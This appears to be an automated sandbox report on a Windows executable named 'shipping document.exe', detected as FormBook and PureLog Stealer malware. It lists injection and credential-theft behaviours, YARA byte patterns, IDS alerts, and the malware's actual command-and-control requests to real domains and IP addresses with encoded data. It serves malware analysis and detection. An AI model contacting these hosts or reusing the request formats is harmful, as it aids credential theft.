Windows Analysis Report
shipping document.exe

Overview

General Information

Sample name: shipping document.exe
Analysis ID: 1430793
MD5: 180165361384e56db00389733f0c54f5
SHA1: 1d48e601e3ba392fafde82b4a7fc0a39fba0a382
SHA256: 48ca70c01e870434304ccd508ef88d824b8d3c9588c990402dae450a5e56f73c
Tags: exe

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • shipping document.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\shipping document.exe" MD5: 180165361384E56DB00389733F0C54F5)
    • shipping document.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\shipping document.exe" MD5: 180165361384E56DB00389733F0C54F5)
      • oWRaEnEJAq.exe (PID: 2132 cmdline: "C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • openfiles.exe (PID: 2128 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
          • oWRaEnEJAq.exe (PID: 1620 cmdline: "C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6044 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a6c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de99:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17408:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1680848791.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
2.2.shipping document.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.shipping document.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ce83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.shipping document.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.shipping document.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dc83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.shipping document.exe.5ad0000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
              No Sigma rule has matched

              AV Detection

              Source: shipping document.exe, ReversingLabs: Detection: 23%
              Source: shipping document.exe, Virustotal: Detection: 35%
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: shipping document.exe, Joe Sandbox ML: detected
              Source: shipping document.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: shipping document.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: OpnFiles.pdb source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oWRaEnEJAq.exe, 00000006.00000002.4109844179.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp, oWRaEnEJAq.exe, 00000008.00000000.2100219438.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp
              Source: Binary string: wntdll.pdbUGP source: shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: shipping document.exe, shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OpnFiles.pdbGCTL source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\openfiles.exe, Code function: 7_2_027AB970 FindFirstFileW,FindNextFileW,FindClose, 7_2_027AB970
              Source: C:\Windows\SysWOW64\openfiles.exe, Code function: 4x nop then xor eax, eax, 7_2_027993B0

              Networking

              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49740 -> 80.240.20.220:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 157.7.107.63:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 157.7.107.63:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 157.7.107.63:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 172.217.16.36:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 172.217.16.36:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 172.217.16.36:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 203.161.46.103:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 203.161.46.103:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 203.161.46.103:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 162.240.81.18:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 162.240.81.18:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49757 -> 162.240.81.18:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 217.160.0.111:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 217.160.0.111:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49761 -> 217.160.0.111:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49762 -> 64.190.62.22:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49763 -> 64.190.62.22:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49765 -> 64.190.62.22:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49766 -> 118.27.122.214:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49767 -> 118.27.122.214:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49769 -> 118.27.122.214:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49770 -> 34.149.87.45:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49771 -> 34.149.87.45:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49773 -> 34.149.87.45:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49774 -> 31.186.11.254:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49775 -> 31.186.11.254:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49777 -> 31.186.11.254:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49778 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49779 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49781 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49782 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49783 -> 91.195.240.19:80
              Source: Joe Sandbox View, IP Address: 162.240.81.18
              Source: Joe Sandbox View, IP Address: 64.190.62.22
              Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
              Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP
              Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
              Source: Joe Sandbox View, ASN Name: AS-CHOOPAUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=0byNfP8xYbFTvv3TFTBCb86kR2BGbvQk+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhMgT0gLImR5/DqviqEDtH5dgpFLFfPLyFVKE= HTTP/1.1Host: www.jthzbrdb.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=ZDaHJbFbnHAFPJixhC0W5VJcO+3r+/EbU9/fBM2jNZ9+Ym38hIZ/X5pUYkV2fcPscAyJxVIUpy5G03sBlccn/BoOXNW31gfQYe8OGfTtnGJDjF2r8y9L4VM=&AlB=sdJPX HTTP/1.1Host: www.mz3fk6g3.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=meGryHO7z/6rT923FBL9q9LP9fsOajdjArpVhNvG0WuyKOeyc4yYaP5CwAgWJzIE3e4WxKJNZpro8/ttq32sXWhgj4qMLx7ltRSWVCmHVfZWVpKDtZXBa18= HTTP/1.1Host: www.heldhold.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=i+yp5adQUIH0VEgvOjK1asLzAf4iESqSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmxelGkpS4OcyZPgZgITeIYkhl82tlqROkzZ0=&AlB=sdJPX HTTP/1.1Host: www.tavernadoheroi.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=pss1I4hPKcXAgTeMienjdKFyes9H9oPLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslINQQyxLsDbCNKxleUNo2npjmmo3Auov63B2Q= HTTP/1.1Host: www.carliente.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=+UthD+705U1ao7DlNG8D0XAg53Vx3iw389CE+agLgXg1A2DbEeFYSszaWdWCIKr2NLn015a/QKEJl6wBw76YOQKFwTcvF/Pv+Bjw8BucK5rNlKIw4A0tIOg=&AlB=sdJPX HTTP/1.1Host: www.paydayloans3.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=NDJWYY+b4MJOe0SOZhyP3/gD5HDsZQ87d1VJjuxPOAPtwNnLRfPhezVGmkxSEIZ/YXBHCU3m0ogYj5Dd6IJsMpuoncQuveGk65BlZhCiT7/R0prs9m7zKG0= HTTP/1.1Host: www.kansaiwoody.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=xT2trqCQSb0YGfwnfC7AAWCSgoebgz86z2nMETOowAc4zyKeScBuNk+zQrcmduROogVqNtfeQZVF2OAhYZAs5wKafa9/anE/xTNtRCFpw92mm1bEow/bC00=&AlB=sdJPX HTTP/1.1Host: www.corvidemporium.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=chI4PXqGf2akS9KXcN1/fIedDZpx1haPemMkxCQLjjdC+0LHJVcL8RVSGr04qmANi3qgGmUbQWZg1h9oBh32jeRnCnRBYigKMCJed0uSuMGI415b3fHmBd4= HTTP/1.1Host: www.levelstep.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: global trafficHTTP traffic detected: GET /3g97/?12l42=SimubthO8j6ps9851O6iFrPFbhU0j9rq0/tYQBfzEgGK5hVM85jEDi8N6ZmkhSeBx8n/pYDrpewbJx/zj6rVSge67MmYz8zyJ6w88vNyo3JtRae+fbqeQKU=&AlB=sdJPX HTTP/1.1Host: www.brothedboil.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
              Source: unknownDNS traffic detected: queries for: www.jthzbrdb.fun
              Source: unknownHTTP traffic detected: POST /3g97/ HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 202Cache-Control: max-age=0Origin: http://www.a-two-spa-salon.comReferer: http://www.a-two-spa-salon.com/3g97/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 31 32 6c 34 32 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 4d 78 46 39 53 47 65 4f 74 31 68 4e 66 42 67 4f 2b 75 6d 48 71 34 64 4c 4a 67 6b 4b 52 42 31 65 38 64 2f 50 6e 43 4f 58 73 31 2b 51 34 69 74 33 74 6a 61 6a 77 61 5a 53 50 70 6e 66 63 32 32 5a 7a 4f 50 45 42 62 51 61 6c 62 58 67 50 6a 71 6e 69 6e 54 2f 55 34 34 59 57 39 72 57 6d 58 4a 55 77 39 55 79 77 30 5a 56 2b 54 44 6e 41 4f 36 64 68 46 57 2f 49 72 62 47 71 72 62 46 4c 47 73 4e 37 39 57 34 46 55 35 2f 7a 66 6e 66 41 30 56 75 67 74 70 52 70 49 64 46 53 55 41 66 36 70 74 45 38 77 4c 49 37 46 2f 78 77 2f 59 53 64 4a 7a 45 56 4d 62 4f 67 3d 3d Data Ascii: 12l42=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpRpIdFSUAf6ptE8wLI7F/xw/YSdJzEVMbOg==
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 24 Apr 2024 05:26:07 GMT
                Content-Type: text/html
                Content-Length: 1409
                Connection: close
                Vary: Accept-Encoding
                ETag: "629dd94c-581"
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 24 Apr 2024 05:26:23 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Server: Apache
                X-Powered-By: PHP/8.2.18
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 24 Apr 2024 05:26:27 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Server: Apache
                X-Powered-By: PHP/8.2.18
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 24 Apr 2024 05:26:29 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Server: Apache
                X-Powered-By: PHP/8.2.18
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Referrer-Policy: no-referrer
                Content-Length: 1566
                Date: Wed, 24 Apr 2024 05:26:46 GMT
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Referrer-Policy: no-referrer
                Content-Length: 1566
                Date: Wed, 24 Apr 2024 05:26:49 GMT
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Referrer-Policy: no-referrer
                Content-Length: 1566
                Date: Wed, 24 Apr 2024 05:26:52 GMT
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Referrer-Policy: no-referrer
                Content-Length: 1566
                Date: Wed, 24 Apr 2024 05:26:55 GMT
                Connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 24 Apr 2024 05:27:02 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 24 Apr 2024 05:27:05 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 24 Apr 2024 05:27:08 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 24 Apr 2024 05:27:10 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.20.1
                Date: Wed, 24 Apr 2024 05:27:16 GMT
                Content-Type: text/html
                Content-Length: 3650
                Connection: close
                ETag: "636d2d22-e42"
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Wed, 24 Apr 2024 05:27:20 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42"
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Wed, 24 Apr 2024 05:27:23 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42"
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Wed, 24 Apr 2024 05:27:26 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42"
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 24 Apr 2024 05:28:03 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
